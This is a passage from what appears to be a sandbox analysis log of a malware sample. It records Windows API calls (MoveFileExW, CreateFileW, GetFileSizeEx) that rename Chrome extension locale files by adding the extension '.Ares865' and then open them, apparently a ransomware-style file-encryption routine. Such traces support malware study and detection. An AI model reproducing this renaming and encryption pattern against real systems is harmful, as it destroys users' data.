Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.Ares865") returned 172 [0100.394] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.396] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16348) returned 1 [0100.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" [0100.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.Ares865") returned 169 [0100.400] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.401] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16348) returned 1 [0100.405] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" [0100.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.Ares865") returned 169 [0100.405] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16343) returned 1 [0100.411] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" [0100.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.Ares865") returned 169 [0100.411] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16197) returned 1 [0100.417] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" [0100.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.Ares865") returned 169 [0100.417] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16060) returned 1 [0100.423] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" [0100.423] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.Ares865") returned 169 [0100.423] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16267) returned 1 [0100.429] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" [0100.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.Ares865") returned 169 [0100.429] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21028) returned 1 [0100.438] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" [0100.439] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.Ares865") returned 169 [0100.439] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22591) returned 1 [0100.444] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" [0100.445] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.Ares865") returned 169 [0100.445] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16831) returned 1 [0100.451] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" [0100.452] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.Ares865") returned 169 [0100.452] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.454] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16747) returned 1 [0100.460] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" [0100.460] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.Ares865") returned 169 [0100.460] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" 